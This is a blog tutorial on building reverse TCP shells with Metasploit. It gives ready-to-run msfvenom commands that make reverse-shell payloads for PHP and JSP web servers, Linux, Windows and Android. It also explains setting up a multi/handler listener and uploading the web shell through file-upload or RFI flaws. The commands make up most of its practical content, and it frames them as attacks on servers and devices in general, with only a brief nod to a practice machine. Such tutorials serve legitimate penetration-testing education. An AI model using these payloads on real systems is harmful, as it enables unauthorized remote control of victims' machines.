Mar 13, 2022

Reverse TCP shell with Metasploit

Metasploit is an awesome tool. It can be used to automate the exploitation process, generate shellcodes, use as a listener, etc. I hope to start a tutorial serious on the Metasploit framework and it's partner programs. So in today's tutorial, we are going to see how we can build a reverse TCP shell with Metasploit. As an example, we use msfvenom for creating a web shell in PHP and use Metasploit to get the session. It can create a reverse TCP connection to our mashing.

Reverse TCP vs Bind TCP shell

First of all let's clarify what is a reverse TCP shell, What's a bind shell and how they work. In both of these situations, there is an Attacker mashing and a victim server. In a reverse shell, we open a connection from the victim server to the attacker's mashing. We set up a listener on the attacker's mashing. It waits for an incoming connection from the victim. When it receives the TCP connection it serves as a shell to access the victim server.

A bind shell works in a different way. The payload will bind a shell to a specific port on the victim server. So the attacker can use his mashing to connect back to the victim server.

Generating the exploit using Msfvenom

First, we use msfvenom for creating our shell. This tool is packed with the Metasploit framework and can be used to generate exploits for multi-platforms such as Android, Windows, PHP servers, etc.

Following is the syntax for generating an exploit with msfvenom.

msfvenom -p php/meterpreter_reverse_tcp -o shell.php LHOST= LPORT=555

Here we have supplied many arguments to msfvenom tool. Let's see what they do. At the moment we don't use any encoding. In later we can use them.

Hear -p stands for payload. It tells which payload we want to use. Here we used meterpreter as the payload. You can get the list of available payloads by using the command msfvenom --list payloads. In the above example, we used a php payload since we are going to build a Web shell.

-o This is an output format. We have specified shell.php. So our output file will be saved as shell.php.

In the following list we can see some payload types we use often.

Web servers

Most Web servers run PHP as there server-side language. We can build a PHP web shell with MSFvenom by using "php/meterpreter_reverse_tcp" as the payload. Since we are uploading it to a PHP server the extension of the shell should be "PHP".

msfvenom -p php/meterpreter_reverse_tcp -o shell.php LHOST= LPORT=555

What about a JSP server. We can build a web shell as a JSP file and try to upload it. So we want to use "java/jsp_shell_reverse_tcp" as our payload and the output file type should be ".jsp".

msfvenom -p java/jsp_shell_reverse_tcp -o shell.jsp LHOST= LPORT=555

Linux platforms

If we want to attack a Linux server we can use "linux/x86/meterpreter/reverse_tcp" as our payload. Also we an use ".elf" as the output file.

msfvenom -p linux/x86/meterpreter/reverse_tcp -o shell.elf LHOST= LPORT=555

Windows mashings

For Windows, we can use meterpreter as the payload. So we should select "windows/meterpreter/reverse_tcp". As you know the extension should be ".exe".

msfvenom -p windows/meterpreter/reverse_tcp -o shell.exe LHOST= LPORT=555

Android devices

We know that Android is the world's most popular mobile operating system. Metasploit has various payloads for Android. vCommonly we use "android/meterpreter_reverse_tcp" to attack Android devices. The output file type should be ".APK".

msfvenom -p android/meterpreter_reverse_tcp -o shell.apk LHOST= LPORT=555

LHOST is the IP of attacker mashing. It should be our public IP. Because a reverse shell is connected from victim mashing to our mashing.

LPORT is any opened port on our mashing.

You can see we have generated our shell as a php file. Now we can use any method like RFI , FUV etc to upload this to a server. I'll use web for pentester vulnerable mashing. Before we execute our shell we want to set a listener for catch our connection.

Now we start metasploit framework. There some options to use Metasploit like msfcli, msfweb interface , armitage , msfconsole, etc. Most of times we use msfconsole for this.

Yes, a beautiful interface. This is an interactive shell and we can use it easily. First, we want to set a handler for our connection. The handler is responsible for handling reverse connections. Here we have used multi/handler . You can set it with use exploit command.

Now we have to set some extra options. Any time in msfconsole you can find which options you want to set by entering the command show options.

In the above pic, we can see we need to set LHOST and LPORT. Let's set them. Both of them are the same as what we used in generating our shell.

OK now is the time to attack. We use the command run to start the process.

It is waiting for an incoming connection. Now we can execute our shell on a web server.

Yes. It worked. we got our metepreter shell. Now we can do many things. I'll post another tutorial on meterpreter. Till then you can see what to do with command help . :-)

Jun 22
Protostar Stack0 walkthrough

Hello there, In this tutorial we are going to learn Linux exploit development. We use protostar....

Mar 12
Remote Command Execution

In this. article we are going to see another interesting topic in web application hacking. This is....

Mar 09
Best ethical hacking books for beginners

Hacking is an interesting area in computer science to study. In this article, I'm going to....

Replying to 's comment Cancel reply
Thilan Danushka Dissanayaka

Thilan Dissanayaka

Hi, I'm Thilan from Srilanka. An undergraduate Engineering student of University of Ruhuna. I love to explorer things about CS, Hacking, Reverse engineering etc.